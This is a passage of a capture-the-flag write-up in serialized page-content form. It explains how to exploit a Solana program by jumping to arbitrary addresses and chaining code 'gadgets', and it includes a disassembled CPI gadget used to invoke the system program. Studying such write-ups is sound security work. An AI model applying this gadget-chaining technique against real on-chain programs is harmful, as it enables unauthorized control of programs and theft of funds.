flag:",{"type":28,"tag":29,"props":43541,"children":43542},{},[43543],{"type":28,"tag":206,"props":43544,"children":43547},{"alt":43545,"src":43546},"Screenshot","/posts/jumping-around-in-the-vm/screenshot.png",[],{"type":28,"tag":29,"props":43549,"children":43550},{},[43551],{"type":33,"value":43552},"It works! Now we \"just\" need to find a way to execute the program above, by leveraging the single Instruction call to the program. This is easier said than done. The next section will dive into the details of the Solana VM to understand how we can achieve this.",{"type":28,"tag":63,"props":43554,"children":43556},{"id":43555},"solution-implementation",[43557],{"type":33,"value":43558},"Solution Implementation",{"type":28,"tag":29,"props":43560,"children":43561},{},[43562,43564,43569],{"type":33,"value":43563},"Now that we know what we need to do, let's look at how we can actually do it. We have to code the above program, by chaining together multiple ",{"type":28,"tag":98,"props":43565,"children":43567},{"className":43566},[],[43568],{"type":33,"value":35307},{"type":33,"value":43570}," invocations:",{"type":28,"tag":234,"props":43572,"children":43576},{"className":43573,"code":43574,"language":43575,"meta":7,"style":7},"language-mermaid shiki shiki-themes slack-dark","graph LR\n    A[0: entrypoint] --> B[1: process_instruction]\n    B --> C[2: process]\n    C --> D[3: gadget1]\n    C --> E[3: process]\n    E --> F[4: gadget2]\n    E --> G[...]\n","mermaid",[43577],{"type":28,"tag":98,"props":43578,"children":43579},{"__ignoreMap":7},[43580,43588,43596,43604,43612,43620,43628],{"type":28,"tag":116,"props":43581,"children":43582},{"class":245,"line":246},[43583],{"type":28,"tag":116,"props":43584,"children":43585},{},[43586],{"type":33,"value":43587},"graph LR\n",{"type":28,"tag":116,"props":43589,"children":43590},{"class":245,"line":256},[43591],{"type":28,"tag":116,"props":43592,"children":43593},{},[43594],{"type":33,"value":43595},"    A[0: entrypoint] --> B[1: process_instruction]\n",{"type":28,"tag":116,"props":43597,"children":43598},{"class":245,"line":293},[43599],{"type":28,"tag":116,"props":43600,"children":43601},{},[43602],{"type":33,"value":43603},"    B --> C[2: process]\n",{"type":28,"tag":116,"props":43605,"children":43606},{"class":245,"line":361},[43607],{"type":28,"tag":116,"props":43608,"children":43609},{},[43610],{"type":33,"value":43611},"    C --> D[3: gadget1]\n",{"type":28,"tag":116,"props":43613,"children":43614},{"class":245,"line":387},[43615],{"type":28,"tag":116,"props":43616,"children":43617},{},[43618],{"type":33,"value":43619},"    C --> E[3: process]\n",{"type":28,"tag":116,"props":43621,"children":43622},{"class":245,"line":400},[43623],{"type":28,"tag":116,"props":43624,"children":43625},{},[43626],{"type":33,"value":43627},"    E --> F[4: gadget2]\n",{"type":28,"tag":116,"props":43629,"children":43630},{"class":245,"line":614},[43631],{"type":28,"tag":116,"props":43632,"children":43633},{},[43634],{"type":33,"value":43635},"    E --> G[...]\n",{"type":28,"tag":29,"props":43637,"children":43638},{},[43639],{"type":33,"value":43640},"What are those gadgets? The Solana VM does not enforce that the target of a jump is a valid one, meaning that it's possible to jump to arbitrary addresses!",{"type":28,"tag":29,"props":43642,"children":43643},{},[43644,43646,43652],{"type":33,"value":43645},"To mimic the execution of our solution, we need a gadget that lets us CPI into system_program, with parameters we control. How do we obtain those? We can use ",{"type":28,"tag":87,"props":43647,"children":43649},{"href":40107,"rel":43648},[91],[43650],{"type":33,"value":43651},"Binary Ninja",{"type":33,"value":43653}," to find a suitable gadget for this.",{"type":28,"tag":29,"props":43655,"children":43656},{},[43657,43659,43666],{"type":33,"value":43658},"Before throwing the on-chain program to binja, it's useful to find a way to get symbols for it. One solution is to patch the cargo-build-sbf command to ",{"type":28,"tag":87,"props":43660,"children":43663},{"href":43661,"rel":43662},"https://github.com/solana-labs/solana/blob/4ee5078e5ffdfff36d3f7920217788e2892c1a85/sdk/cargo-build-sbf/src/main.rs#L789",[91],[43664],{"type":33,"value":43665},"skip the strip pass",{"type":33,"value":141},{"type":28,"tag":75,"props":43668,"children":43670},{"id":43669},"cpi-gadget",[43671],{"type":33,"value":43672},"CPI Gadget",{"type":28,"tag":29,"props":43674,"children":43675},{},[43676,43678,43683,43685,43692,43694,43700],{"type":33,"value":43677},"Looking at the program source, one idea is to look for the cpi gadget around the ",{"type":28,"tag":98,"props":43679,"children":43681},{"className":43680},[],[43682],{"type":33,"value":37918},{"type":33,"value":43684}," function. This function calls into the solana sdk's function ",{"type":28,"tag":87,"props":43686,"children":43689},{"href":43687,"rel":43688},"https://github.com/solana-labs/solana/blob/v1.17.4/sdk/program/src/program.rs#L295-L310",[91],[43690],{"type":33,"value":43691},"invoke_signed_unchecked",{"type":33,"value":43693},", yielding a powerful gadget at the address ",{"type":28,"tag":98,"props":43695,"children":43697},{"className":43696},[],[43698],{"type":33,"value":43699},"0x100001ba8",{"type":33,"value":141},{"type":28,"tag":234,"props":43702,"children":43704},{"className":2652,"code":43703,"language":2651,"meta":7,"style":7},"solana_program::program::invoke_signed_unchecked\n100001ba8  79a278ff00000000   ldxdw r2, [r10-136] {var_88}\n100001bb0  79a380ff00000000   ldxdw r3, [r10-128] {var_80}\n100001bb8  79a468ff00000000   ldxdw r4, [r10-152] {var_98}\n100001bc0  79a570ff00000000   ldxdw r5, [r10-144] {var_90}\n100001bc8  8520000020100000   call sol_invoke_signed_rust\n100001bd0  5500040000000000   jne \u003C+4> r0, 0x0\n\n100001bd8  b701000018000000   mov r1, 0x18\n100001be0  79a288ff00000000   ldxdw r2, [r10-120] {var_78}\n100001be8  6312000000000000   stxw [r2-0], r1  {0x18}\n100001bf0  0500030000000000   ja \u003C+3>\n\n100001bf8  79a188ff00000000   ldxdw r1, [r10-120] {var_78}\n100001c00  bf02000000000000   mov r2, r0\n100001c08  8510000075000000   call _ZN94_$LT$solana_program...$u64$GT$$GT$4from17ha0d289b72861b06dE\n\n100001c10  79a2b8ff00000000   ldxdw r2, [r10-72] {var_48}\n100001c18  1502040000000000   jeq \u003C+4> r2, 0x0\n\n100001c20  2702000022000000   mul r2, 0x22\n100001c28  79a1b0ff00000000   ldxdw r1, [r10-80] {var_50}\n100001c30  b703000001000000   mov r3, 0x1\n100001c38  8510000003feffff   call __rust_dealloc\n\n100001c40  79a2d0ff00000000   ldxdw r2, [r10-48] {var_30}\n100001c48  1502030000000000   jeq \u003C+3> r2, 0x0\n\n100001c50  79a1c8ff00000000   ldxdw r1, [r10-56] {var_38}\n100001c58  b703000001000000   mov r3, 0x1\n100001c60  85100000fefdffff   call __rust_dealloc\n\n100001c68  9500000000000000   exit {__return_addr}\n",[43705],{"type":28,"tag":98,"props":43706,"children":43707},{"__ignoreMap":7},[43708,43733,43789,43840,43892,43944,43967,44015,44022,44054,44105,44163,44197,44204,44253,44283,44358,44365,44416,44462,44469,44500,44551,44581,44603,44610,44661,44706,44713,44764,44792,44813,44820],{"type":28,"tag":116,"props":43709,"children":43710},{"class":245,"line":246},[43711,43715,43719,43724,43728],{"type":28,"tag":116,"props":43712,"children":43713},{"style":266},[43714],{"type":33,"value":13319},{"type":28,"tag":116,"props":43716,"children":43717},{"style":370},[43718],{"type":33,"value":3151},{"type":28,"tag":116,"props":43720,"children":43721},{"style":266},[43722],{"type":33,"value":43723},"program",{"type":28,"tag":116,"props":43725,"children":43726},{"style":370},[43727],{"type":33,"value":3151},{"type":28,"tag":116,"props":43729,"children":43730},{"style":272},[43731],{"type":33,"value":43732},"invoke_signed_unchecked\n",{"type":28,"tag":116,"props":43734,"children":43735},{"class":245,"line":256},[43736,43741,43746,43751,43756,43761,43766,43770,43775,43780,43785],{"type":28,"tag":116,"props":43737,"children":43738},{"style":272},[43739],{"type":33,"value":43740},"100001ba8",{"type":28,"tag":116,"props":43742,"children":43743},{"style":272},[43744],{"type":33,"value":43745},"  79a278ff00000000",{"type":28,"tag":116,"props":43747,"children":43748},{"style":272},[43749],{"type":33,"value":43750},"   ldxdw",{"type":28,"tag":116,"props":43752,"children":43753},{"style":272},[43754],{"type":33,"value":43755}," r2",{"type":28,"tag":116,"props":43757,"children":43758},{"style":266},[43759],{"type":33,"value":43760},", [",{"type":28,"tag":116,"props":43762,"children":43763},{"style":272},[43764],{"type":33,"value":43765},"r10",{"type":28,"tag":116,"props":43767,"children":43768},{"style":370},[43769],{"type":33,"value":3996},{"type":28,"tag":116,"props":43771,"children":43772},{"style":350},[43773],{"type":33,"value":43774},"136",{"type":28,"tag":116,"props":43776,"children":43777},{"style":266},[43778],{"type":33,"value":43779},"] {",{"type":28,"tag":116,"props":43781,"children":43782},{"style":272},[43783],{"type":33,"value":43784},"var_88",{"type":28,"tag":116,"props":43786,"children":43787},{"style":266},[43788],{"type":33,"value":406},{"type":28,"tag":116,"props":43790,"children":43791},{"class":245,"line":293},[43792,43797,43802,43806,43811,43815,43819,43823,43827,43831,43836],{"type":28,"tag":116,"props":43793,"children":43794},{"style":272},[43795],{"type":33,"value":43796},"100001bb0",{"type":28,"tag":116,"props":43798,"children":43799},{"style":272},[43800],{"type":33,"value":43801},"  79a380ff00000000",{"type":28,"tag":116,"props":43803,"children":43804},{"style":272},[43805],{"type":33,"value":43750},{"type":28,"tag":116,"props":43807,"children":43808},{"style":272},[43809],{"type":33,"value":43810}," r3",{"type":28,"tag":116,"props":43812,"children":43813},{"style":266},[43814],{"type":33,"value":43760},{"type":28,"tag":116,"props":43816,"children":43817},{"style":272},[43818],{"type":33,"value":43765},{"type":28,"tag":116,"props":43820,"children":43821},{"style":370},[43822],{"type":33,"value":3996},{"type":28,"tag":116,"props":43824,"children":43825},{"style":350},[43826],{"type":33,"value":29503},{"type":28,"tag":116,"props":43828,"children":43829},{"style":266},[43830],{"type":33,"value":43779},{"type":28,"tag":116,"props":43832,"children":43833},{"style":272},[43834],{"type":33,"value":43835},"var_80",{"type":28,"tag":116,"props":43837,"children":43838},{"style":266},[43839],{"type":33,"value":406},{"type":28,"tag":116,"props":43841,"children":43842},{"class":245,"line":361},[43843,43848,43853,43857,43862,43866,43870,43874,43879,43883,43888],{"type":28,"tag":116,"props":43844,"children":43845},{"style":272},[43846],{"type":33,"value":43847},"100001bb8",{"type":28,"tag":116,"props":43849,"children":43850},{"style":272},[43851],{"type":33,"value":43852},"  79a468ff00000000",{"type":28,"tag":116,"props":43854,"children":43855},{"style":272},[43856],{"type":33,"value":43750},{"type":28,"tag":116,"props":43858,"children":43859},{"style":272},[43860],{"type":33,"value":43861}," r4",{"type":28,"tag":116,"props":43863,"children":43864},{"style":266},[43865],{"type":33,"value":43760},{"type":28,"tag":116,"props":43867,"children":43868},{"style":272},[43869],{"type":33,"value":43765},{"type":28,"tag":116,"props":43871,"children":43872},{"style":370},[43873],{"type":33,"value":3996},{"type":28,"tag":116,"props":43875,"children":43876},{"style":350},[43877],{"type":33,"value":43878},"152",{"type":28,"tag":116,"props":43880,"children":43881},{"style":266},[43882],{"type":33,"value":43779},{"type":28,"tag":116,"props":43884,"children":43885},{"style":272},[43886],{"type":33,"value":43887},"var_98",{"type":28,"tag":116,"props":43889,"children":43890},{"style":266},[43891],{"type":33,"value":406},{"type":28,"tag":116,"props":43893,"children":43894},{"class":245,"line":387},[43895,43900,43905,43909,43914,43918,43922,43926,43931,43935,43940],{"type":28,"tag":116,"props":43896,"children":43897},{"style":272},[43898],{"type":33,"value":43899},"100001bc0",{"type":28,"tag":116,"props":43901,"children":43902},{"style":272},[43903],{"type":33,"value":43904},"  79a570ff00000000",{"type":28,"tag":116,"props":43906,"children":43907},{"style":272},[43908],{"type":33,"value":43750},{"type":28,"tag":116,"props":43910,"children":43911},{"style":272},[43912],{"type":33,"value":43913}," r5",{"type":28,"tag":116,"props":43915,"children":43916},{"style":266},[43917],{"type":33,"value":43760},{"type":28,"tag":116,"props":43919,"children":43920},{"style":272},[43921],{"type":33,"value":43765},{"type":28,"tag":116,"props":43923,"children":43924},{"style":370},[43925],{"type":33,"value":3996},{"type":28,"tag":116,"props":43927,"children":43928},{"style":350},[43929],{"type":33,"value":43930},"144",{"type":28,"tag":116,"props":43932,"children":43933},{"style":266},[43934],{"type":33,"value":43779},{"type":28,"tag":116,"props":43936,"children":43937},{"style":272},[43938],{"type":33,"value":43939},"var_90",{"type":28,"tag":116,"props":43941,"children":43942},{"style":266},[43943],{"type":33,"value":406},{"type":28,"tag":116,"props":43945,"children":43946},{"class":245,"line":400},[43947,43952,43957,43962],{"type":28,"tag":116,"props":43948,"children":43949},{"style":272},[43950],{"type":33,"value":43951},"100001bc8",{"type":28,"tag":116,"props":43953,"children":43954},{"style":350},[43955],{"type":33,"value":43956},"  8520000020100000",{"type":28,"tag":116,"props":43958,"children":43959},{"style":272},[43960],{"type":33,"value":43961},"   call",{"type":28,"tag":116,"props":43963,"children":43964},{"style":272},[43965],{"type":33,"value":43966}," sol_invoke_signed_rust\n",{"type":28,"tag":116,"props":43968,"children":43969},{"class":245,"line":614},[43970,43975,43980,43985,43989,43993,43997,44001,44006,44010],{"type":28,"tag":116,"props":43971,"children":43972},{"style":272},[43973],{"type":33,"value":43974},"100001bd0",{"type":28,"tag":116,"props":43976,"children":43977},{"style":350},[43978],{"type":33,"value":43979},"  5500040000000000",{"type":28,"tag":116,"props":43981,"children":43982},{"style":272},[43983],{"type":33,"value":43984},"   jne",{"type":28,"tag":116,"props":43986,"children":43987},{"style":266},[43988],{"type":33,"value":8391},{"type":28,"tag":116,"props":43990,"children":43991},{"style":370},[43992],{"type":33,"value":2268},{"type":28,"tag":116,"props":43994,"children":43995},{"style":350},[43996],{"type":33,"value":17190},{"type":28,"tag":116,"props":43998,"children":43999},{"style":266},[44000],{"type":33,"value":5492},{"type":28,"tag":116,"props":44002,"children":44003},{"style":272},[44004],{"type":33,"value":44005},"r0",{"type":28,"tag":116,"props":44007,"children":44008},{"style":266},[44009],{"type":33,"value":825},{"type":28,"tag":116,"props":44011,"children":44012},{"style":350},[44013],{"type":33,"value":44014},"0x0\n",{"type":28,"tag":116,"props":44016,"children":44017},{"class":245,"line":631},[44018],{"type":28,"tag":116,"props":44019,"children":44020},{"emptyLinePlaceholder":19},[44021],{"type":33,"value":1044},{"type":28,"tag":116,"props":44023,"children":44024},{"class":245,"line":665},[44025,44030,44035,44040,44045,44049],{"type":28,"tag":116,"props":44026,"children":44027},{"style":272},[44028],{"type":33,"value":44029},"100001bd8",{"type":28,"tag":116,"props":44031,"children":44032},{"style":272},[44033],{"type":33,"value":44034},"  b701000018000000",{"type":28,"tag":116,"props":44036,"children":44037},{"style":272},[44038],{"type":33,"value":44039},"   mov",{"type":28,"tag":116,"props":44041,"children":44042},{"style":272},[44043],{"type":33,"value":44044}," r1",{"type":28,"tag":116,"props":44046,"children":44047},{"style":266},[44048],{"type":33,"value":825},{"type":28,"tag":116,"props":44050,"children":44051},{"style":350},[44052],{"type":33,"value":44053},"0x18\n",{"type":28,"tag":116,"props":44055,"children":44056},{"class":245,"line":713},[44057,44062,44067,44071,44075,44079,44083,44087,44092,44096,44101],{"type":28,"tag":116,"props":44058,"children":44059},{"style":272},[44060],{"type":33,"value":44061},"100001be0",{"type":28,"tag":116,"props":44063,"children":44064},{"style":272},[44065],{"type":33,"value":44066},"  79a288ff00000000",{"type":28,"tag":116,"props":44068,"children":44069},{"style":272},[44070],{"type":33,"value":43750},{"type":28,"tag":116,"props":44072,"children":44073},{"style":272},[44074],{"type":33,"value":43755},{"type":28,"tag":116,"props":44076,"children":44077},{"style":266},[44078],{"type":33,"value":43760},{"type":28,"tag":116,"props":44080,"children":44081},{"style":272},[44082],{"type":33,"value":43765},{"type":28,"tag":116,"props":44084,"children":44085},{"style":370},[44086],{"type":33,"value":3996},{"type":28,"tag":116,"props":44088,"children":44089},{"style":350},[44090],{"type":33,"value":44091},"120",{"type":28,"tag":116,"props":44093,"children":44094},{"style":266},[44095],{"type":33,"value":43779},{"type":28,"tag":116,"props":44097,"children":44098},{"style":272},[44099],{"type":33,"value":44100},"var_78",{"type":28,"tag":116,"props":44102,"children":44103},{"style":266},[44104],{"type":33,"value":406},{"type":28,"tag":116,"props":44106,"children":44107},{"class":245,"line":750},[44108,44113,44118,44123,44127,44132,44136,44140,44144,44149,44154,44159],{"type":28,"tag":116,"props":44109,"children":44110},{"style":272},[44111],{"type":33,"value":44112},"100001be8",{"type":28,"tag":116,"props":44114,"children":44115},{"style":350},[44116],{"type":33,"value":44117},"  6312000000000000",{"type":28,"tag":116,"props":44119,"children":44120},{"style":272},[44121],{"type":33,"value":44122},"   stxw",{"type":28,"tag":116,"props":44124,"children":44125},{"style":266},[44126],{"type":33,"value":22695},{"type":28,"tag":116,"props":44128,"children":44129},{"style":272},[44130],{"type":33,"value":44131},"r2",{"type":28,"tag":116,"props":44133,"children":44134},{"style":370},[44135],{"type":33,"value":3996},{"type":28,"tag":116,"props":44137,"children":44138},{"style":350},[44139],{"type":33,"value":353},{"type":28,"tag":116,"props":44141,"children":44142},{"style":266},[44143],{"type":33,"value":22723},{"type":28,"tag":116,"props":44145,"children":44146},{"style":272},[44147],{"type":33,"value":44148},"r1",{"type":28,"tag":116,"props":44150,"children":44151},{"style":266},[44152],{"type":33,"value":44153},"  {",{"type":28,"tag":116,"props":44155,"children":44156},{"style":350},[44157],{"type":33,"value":44158},"0x18",{"type":28,"tag":116,"props":44160,"children":44161},{"style":266},[44162],{"type":33,"value":406},{"type":28,"tag":116,"props":44164,"children":44165},{"class":245,"line":779},[44166,44171,44176,44181,44185,44189,44193],{"type":28,"tag":116,"props":44167,"children":44168},{"style":272},[44169],{"type":33,"value":44170},"100001bf0",{"type":28,"tag":116,"props":44172,"children":44173},{"style":350},[44174],{"type":33,"value":44175},"  0500030000000000",{"type":28,"tag":116,"props":44177,"children":44178},{"style":272},[44179],{"type":33,"value":44180},"   ja",{"type":28,"tag":116,"props":44182,"children":44183},{"style":266},[44184],{"type":33,"value":8391},{"type":28,"tag":116,"props":44186,"children":44187},{"style":370},[44188],{"type":33,"value":2268},{"type":28,"tag":116,"props":44190,"children":44191},{"style":350},[44192],{"type":33,"value":16957},{"type":28,"tag":116,"props":44194,"children":44195},{"style":266},[44196],{"type":33,"value":506},{"type":28,"tag":116,"props":44198,"children":44199},{"class":245,"line":796},[44200],{"type":28,"tag":116,"props":44201,"children":44202},{"emptyLinePlaceholder":19},[44203],{"type":33,"value":1044},{"type":28,"tag":116,"props":44205,"children":44206},{"class":245,"line":847},[44207,44212,44217,44221,44225,44229,44233,44237,44241,44245,44249],{"type":28,"tag":116,"props":44208,"children":44209},{"style":272},[44210],{"type":33,"value":44211},"100001bf8",{"type":28,"tag":116,"props":44213,"children":44214},{"style":272},[44215],{"type":33,"value":44216},"  79a188ff00000000",{"type":28,"tag":116,"props":44218,"children":44219},{"style":272},[44220],{"type":33,"value":43750},{"type":28,"tag":116,"props":44222,"children":44223},{"style":272},[44224],{"type":33,"value":44044},{"type":28,"tag":116,"props":44226,"children":44227},{"style":266},[44228],{"type":33,"value":43760},{"type":28,"tag":116,"props":44230,"children":44231},{"style":272},[44232],{"type":33,"value":43765},{"type":28,"tag":116,"props":44234,"children":44235},{"style":370},[44236],{"type":33,"value":3996},{"type":28,"tag":116,"props":44238,"children":44239},{"style":350},[44240],{"type":33,"value":44091},{"type":28,"tag":116,"props":44242,"children":44243},{"style":266},[44244],{"type":33,"value":43779},{"type":28,"tag":116,"props":44246,"children":44247},{"style":272},[44248],{"type":33,"value":44100},{"type":28,"tag":116,"props":44250,"children":44251},{"style":266},[44252],{"type":33,"value":406},{"type":28,"tag":116,"props":44254,"children":44255},{"class":245,"line":898},[44256,44261,44266,44270,44274,44278],{"type":28,"tag":116,"props":44257,"children":44258},{"style":272},[44259],{"type":33,"value":44260},"100001c00",{"type":28,"tag":116,"props":44262,"children":44263},{"style":272},[44264],{"type":33,"value":44265},"  bf02000000000000",{"type":28,"tag":116,"props":44267,"children":44268},{"style":272},[44269],{"type":33,"value":44039},{"type":28,"tag":116,"props":44271,"children":44272},{"style":272},[44273],{"type":33,"value":43755},{"type":28,"tag":116,"props":44275,"children":44276},{"style":266},[44277],{"type":33,"value":825},{"type":28,"tag":116,"props":44279,"children":44280},{"style":272},[44281],{"type":33,"value":44282},"r0\n",{"type":28,"tag":116,"props":44284,"children":44285},{"class":245,"line":907},[44286,44291,44296,44300,44305,44309,44314,44318,44322,44327,44331,44335,44340,44345,44349,44353],{"type":28,"tag":116,"props":44287,"children":44288},{"style":272},[44289],{"type":33,"value":44290},"100001c08",{"type":28,"tag":116,"props":44292,"children":44293},{"style":350},[44294],{"type":33,"value":44295},"  8510000075000000",{"type":28,"tag":116,"props":44297,"children":44298},{"style":272},[44299],{"type":33,"value":43961},{"type":28,"tag":116,"props":44301,"children":44302},{"style":339},[44303],{"type":33,"value":44304}," _ZN94_",{"type":28,"tag":116,"props":44306,"children":44307},{"style":370},[44308],{"type":33,"value":9956},{"type":28,"tag":116,"props":44310,"children":44311},{"style":339},[44312],{"type":33,"value":44313},"LT",{"type":28,"tag":116,"props":44315,"children":44316},{"style":370},[44317],{"type":33,"value":9956},{"type":28,"tag":116,"props":44319,"children":44320},{"style":272},[44321],{"type":33,"value":13319},{"type":28,"tag":116,"props":44323,"children":44324},{"style":370},[44325],{"type":33,"value":44326},"...$",{"type":28,"tag":116,"props":44328,"children":44329},{"style":272},[44330],{"type":33,"value":7714},{"type":28,"tag":116,"props":44332,"children":44333},{"style":370},[44334],{"type":33,"value":9956},{"type":28,"tag":116,"props":44336,"children":44337},{"style":339},[44338],{"type":33,"value":44339},"GT",{"type":28,"tag":116,"props":44341,"children":44342},{"style":370},[44343],{"type":33,"value":44344},"$$",{"type":28,"tag":116,"props":44346,"children":44347},{"style":339},[44348],{"type":33,"value":44339},{"type":28,"tag":116,"props":44350,"children":44351},{"style":370},[44352],{"type":33,"value":9956},{"type":28,"tag":116,"props":44354,"children":44355},{"style":266},[44356],{"type":33,"value":44357},"4from17ha0d289b72861b06dE\n",{"type":28,"tag":116,"props":44359,"children":44360},{"class":245,"line":981},[44361],{"type":28,"tag":116,"props":44362,"children":44363},{"emptyLinePlaceholder":19},[44364],{"type":33,"value":1044},{"type":28,"tag":116,"props":44366,"children":44367},{"class":245,"line":1011},[44368,44373,44378,44382,44386,44390,44394,44398,44403,44407,44412],{"type":28,"tag":116,"props":44369,"children":44370},{"style":272},[44371],{"type":33,"value":44372},"100001c10",{"type":28,"tag":116,"props":44374,"children":44375},{"style":272},[44376],{"type":33,"value":44377},"  79a2b8ff00000000",{"type":28,"tag":116,"props":44379,"children":44380},{"style":272},[44381],{"type":33,"value":43750},{"type":28,"tag":116,"props":44383,"children":44384},{"style":272},[44385],{"type":33,"value":43755},{"type":28,"tag":116,"props":44387,"children":44388},{"style":266},[44389],{"type":33,"value":43760},{"type":28,"tag":116,"props":44391,"children":44392},{"style":272},[44393],{"type":33,"value":43765},{"type":28,"tag":116,"props":44395,"children":44396},{"style":370},[44397],{"type":33,"value":3996},{"type":28,"tag":116,"props":44399,"children":44400},{"style":350},[44401],{"type":33,"value":44402},"72",{"type":28,"tag":116,"props":44404,"children":44405},{"style":266},[44406],{"type":33,"value":43779},{"type":28,"tag":116,"props":44408,"children":44409},{"style":272},[44410],{"type":33,"value":44411},"var_48",{"type":28,"tag":116,"props":44413,"children":44414},{"style":266},[44415],{"type":33,"value":406},{"type":28,"tag":116,"props":44417,"children":44418},{"class":245,"line":1029},[44419,44424,44429,44434,44438,44442,44446,44450,44454,44458],{"type":28,"tag":116,"props":44420,"children":44421},{"style":272},[44422],{"type":33,"value":44423},"100001c18",{"type":28,"tag":116,"props":44425,"children":44426},{"style":350},[44427],{"type":33,"value":44428},"  1502040000000000",{"type":28,"tag":116,"props":44430,"children":44431},{"style":272},[44432],{"type":33,"value":44433},"   jeq",{"type":28,"tag":116,"props":44435,"children":44436},{"style":266},[44437],{"type":33,"value":8391},{"type":28,"tag":116,"props":44439,"children":44440},{"style":370},[44441],{"type":33,"value":2268},{"type":28,"tag":116,"props":44443,"children":44444},{"style":350},[44445],{"type":33,"value":17190},{"type":28,"tag":116,"props":44447,"children":44448},{"style":266},[44449],{"type":33,"value":5492},{"type":28,"tag":116,"props":44451,"children":44452},{"style":272},[44453],{"type":33,"value":44131},{"type":28,"tag":116,"props":44455,"children":44456},{"style":266},[44457],{"type":33,"value":825},{"type":28,"tag":116,"props":44459,"children":44460},{"style":350},[44461],{"type":33,"value":44014},{"type":28,"tag":116,"props":44463,"children":44464},{"class":245,"line":1038},[44465],{"type":28,"tag":116,"props":44466,"children":44467},{"emptyLinePlaceholder":19},[44468],{"type":33,"value":1044},{"type":28,"tag":116,"props":44470,"children":44471},{"class":245,"line":1047},[44472,44477,44482,44487,44491,44495],{"type":28,"tag":116,"props":44473,"children":44474},{"style":272},[44475],{"type":33,"value":44476},"100001c20",{"type":28,"tag":116,"props":44478,"children":44479},{"style":350},[44480],{"type":33,"value":44481},"  2702000022000000",{"type":28,"tag":116,"props":44483,"children":44484},{"style":272},[44485],{"type":33,"value":44486},"   mul",{"type":28,"tag":116,"props":44488,"children":44489},{"style":272},[44490],{"type":33,"value":43755},{"type":28,"tag":116,"props":44492,"children":44493},{"style":266},[44494],{"type":33,"value":825},{"type":28,"tag":116,"props":44496,"children":44497},{"style":350},[44498],{"type":33,"value":44499},"0x22\n",{"type":28,"tag":116,"props":44501,"children":44502},{"class":245,"line":1071},[44503,44508,44513,44517,44521,44525,44529,44533,44538,44542,44547],{"type":28,"tag":116,"props":44504,"children":44505},{"style":272},[44506],{"type":33,"value":44507},"100001c28",{"type":28,"tag":116,"props":44509,"children":44510},{"style":272},[44511],{"type":33,"value":44512},"  79a1b0ff00000000",{"type":28,"tag":116,"props":44514,"children":44515},{"style":272},[44516],{"type":33,"value":43750},{"type":28,"tag":116,"props":44518,"children":44519},{"style":272},[44520],{"type":33,"value":44044},{"type":28,"tag":116,"props":44522,"children":44523},{"style":266},[44524],{"type":33,"value":43760},{"type":28,"tag":116,"props":44526,"children":44527},{"style":272},[44528],{"type":33,"value":43765},{"type":28,"tag":116,"props":44530,"children":44531},{"style":370},[44532],{"type":33,"value":3996},{"type":28,"tag":116,"props":44534,"children":44535},{"style":350},[44536],{"type":33,"value":44537},"80",{"type":28,"tag":116,"props":44539,"children":44540},{"style":266},[44541],{"type":33,"value":43779},{"type":28,"tag":116,"props":44543,"children":44544},{"style":272},[44545],{"type":33,"value":44546},"var_50",{"type":28,"tag":116,"props":44548,"children":44549},{"style":266},[44550],{"type":33,"value":406},{"type":28,"tag":116,"props":44552,"children":44553},{"class":245,"line":1137},[44554,44559,44564,44568,44572,44576],{"type":28,"tag":116,"props":44555,"children":44556},{"style":272},[44557],{"type":33,"value":44558},"100001c30",{"type":28,"tag":116,"props":44560,"children":44561},{"style":272},[44562],{"type":33,"value":44563},"  b703000001000000",{"type":28,"tag":116,"props":44565,"children":44566},{"style":272},[44567],{"type":33,"value":44039},{"type":28,"tag":116,"props":44569,"children":44570},{"style":272},[44571],{"type":33,"value":43810},{"type":28,"tag":116,"props":44573,"children":44574},{"style":266},[44575],{"type":33,"value":825},{"type":28,"tag":116,"props":44577,"children":44578},{"style":350},[44579],{"type":33,"value":44580},"0x1\n",{"type":28,"tag":116,"props":44582,"children":44583},{"class":245,"line":1181},[44584,44589,44594,44598],{"type":28,"tag":116,"props":44585,"children":44586},{"style":272},[44587],{"type":33,"value":44588},"100001c38",{"type":28,"tag":116,"props":44590,"children":44591},{"style":272},[44592],{"type":33,"value":44593},"  8510000003feffff",{"type":28,"tag":116,"props":44595,"children":44596},{"style":272},[44597],{"type":33,"value":43961},{"type":28,"tag":116,"props":44599,"children":44600},{"style":272},[44601],{"type":33,"value":44602}," __rust_dealloc\n",{"type":28,"tag":116,"props":44604,"children":44605},{"class":245,"line":1212},[44606],{"type":28,"tag":116,"props":44607,"children":44608},{"emptyLinePlaceholder":19},[44609],{"type":33,"value":1044},{"type":28,"tag":116,"props":44611,"children":44612},{"class":245,"line":1254},[44613,44618,44623,44627,44631,44635,44639,44643,44648,44652,44657],{"type":28,"tag":116,"props":44614,"children":44615},{"style":272},[44616],{"type":33,"value":44617},"100001c40",{"type":28,"tag":116,"props":44619,"children":44620},{"style":272},[44621],{"type":33,"value":44622},"  79a2d0ff00000000",{"type":28,"tag":116,"props":44624,"children":44625},{"style":272},[44626],{"type":33,"value":43750},{"type":28,"tag":116,"props":44628,"children":44629},{"style":272},[44630],{"type":33,"value":43755},{"type":28,"tag":116,"props":44632,"children":44633},{"style":266},[44634],{"type":33,"value":43760},{"type":28,"tag":116,"props":44636,"children":44637},{"style":272},[44638],{"type":33,"value":43765},{"type":28,"tag":116,"props":44640,"children":44641},{"style":370},[44642],{"type":33,"value":3996},{"type":28,"tag":116,"props":44644,"children":44645},{"style":350},[44646],{"type":33,"value":44647},"48",{"type":28,"tag":116,"props":44649,"children":44650},{"style":266},[44651],{"type":33,"value":43779},{"type":28,"tag":116,"props":44653,"children":44654},{"style":272},[44655],{"type":33,"value":44656},"var_30",{"type":28,"tag":116,"props":44658,"children":44659},{"style":266},[44660],{"type":33,"value":406},{"type":28,"tag":116,"props":44662,"children":44663},{"class":245,"line":1262},[44664,44669,44674,44678,44682,44686,44690,44694,44698,44702],{"type":28,"tag":116,"props":44665,"children":44666},{"style":272},[44667],{"type":33,"value":44668},"100001c48",{"type":28,"tag":116,"props":44670,"children":44671},{"style":350},[44672],{"type":33,"value":44673},"  